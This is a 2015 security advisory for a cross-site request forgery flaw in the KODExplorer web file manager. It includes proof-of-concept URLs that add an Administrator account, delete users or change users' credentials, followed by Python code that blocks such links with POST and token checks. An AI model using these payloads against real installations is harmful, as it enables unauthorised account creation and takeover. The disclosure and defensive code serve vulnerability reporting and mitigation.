KODExplorer Web File Manager Cross Site Request Forgery
Posted on 31 December 2015
================================================================================
# KODExplorer web file manager - Cross Site Request Forgery
================================================================================
# Vendor Homepage: https://github.com/kalcaddle/KODExplorer/ - http://kalcaddle.com/
# Date: 30-Dec-2015
# Software Link: https://github.com/kalcaddle/KODExplorer/archive/master.zip
# Exploit Author : Ben Khlifa Fahmi - Xtnr3v0lt
================================================================================

Description :
There is no CSRF token protection on the user management area. An attacker can use the PoC below to add, edit or remove any user by sending a link to a logged-in user who holds the User Management privilege.

# PoC :

Add user :
http://localhost/index.php?member/add&name=[username]&password=[password]&role=Administrator

Delete User:
http://localhost/index.php?member/del&name=[username]

Edit User:
http://localhost/index.php?member/edit&name=[username]&name_to=[new_username]&role_to=[new_group]&password_to=[new_password]

Patch released :
Check my git https://github.com/benkhlifafahmi/KODExplorer
================================================================================
# Discovered By : Ben Khlifa Fahmi(https://www.benkhlifa.com/) from Tunisian Whitehats Security (@WhitehatsTN)
================================================================================
Special Thanks to both the community Tunisian Whitehats Security and Arab Oracle Users Group
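The mitigation for the issue above is the one the advisory names: a per-session anti-CSRF token that state-changing actions must carry, plus refusing to perform those actions over a plain GET link. The following Python snippet is an added example written for this page; it is not KODExplorer code (which is PHP) and not the author's patch. The `Session` and `Request` classes are constructed stand-ins, and the action names (`member/add`, `member/del`, `member/edit`) and the `index.php?action&key=value` URL shape are taken from the PoC URLs.

```python
import hmac
import secrets
from dataclasses import dataclass, field
from typing import Dict, Optional, Tuple
from urllib.parse import urlsplit, parse_qsl

# Actions named in the advisory's PoC URLs; all three change server state.
STATE_CHANGING_ACTIONS = {"member/add", "member/del", "member/edit"}


@dataclass
class Session:
    """Constructed stand-in for a logged-in session: one random token per session."""
    session_id: str
    csrf_token: str = field(default_factory=lambda: secrets.token_hex(32))


@dataclass
class Request:
    """Constructed stand-in for an incoming HTTP request."""
    method: str
    action: str                       # e.g. "member/add"
    params: Dict[str, str]
    form_token: Optional[str] = None  # token the client sent with the request, if any


def request_from_url(url: str, method: str = "GET", form_token: Optional[str] = None) -> Request:
    """Parse a URL of the advisory's shape (index.php?member/add&name=...) into a Request.

    The first query component carries the action; the remaining key=value pairs
    are the parameters.
    """
    query = urlsplit(url).query
    parts = query.split("&", 1)
    action = parts[0]
    params = dict(parse_qsl(parts[1])) if len(parts) > 1 else {}
    return Request(method=method, action=action, params=params, form_token=form_token)


def check_csrf(request: Request, session: Session) -> Tuple[bool, str]:
    """Decide whether a request may proceed.

    Read-only actions pass. State-changing actions must arrive by POST and carry
    a token equal to the session's token (compared in constant time). A plain link
    like the advisory's PoC URLs fails both requirements.
    """
    if request.action not in STATE_CHANGING_ACTIONS:
        return True, "read-only action"
    if request.method.upper() != "POST":
        return False, "state-changing action must use POST, not GET"
    if request.form_token is None:
        return False, "missing CSRF token"
    if not hmac.compare_digest(request.form_token.encode(), session.csrf_token.encode()):
        return False, "invalid CSRF token"
    return True, "ok"


if __name__ == "__main__":
    session = Session(session_id="demo-session")
    # The advisory's PoC links as a victim's browser would issue them: plain GET, no token.
    pocs = (
        "http://localhost/index.php?member/add&name=[username]&password=[password]&role=Administrator",
        "http://localhost/index.php?member/del&name=[username]",
    )
    for poc in pocs:
        req = request_from_url(poc)
        print(req.action, "via GET ->", check_csrf(req, session))
    # A legitimate submission from the application's own form: POST plus the session token.
    legit = request_from_url(pocs[0], method="POST", form_token=session.csrf_token)
    print(legit.action, "via POST with token ->", check_csrf(legit, session))
```

The token check uses `hmac.compare_digest` so that a wrong token is rejected without leaking how many leading bytes matched; the POST requirement on its own already defeats the link-based PoC, because a cross-site `<a href>` or `<img src>` cannot issue a POST that carries the victim's session token.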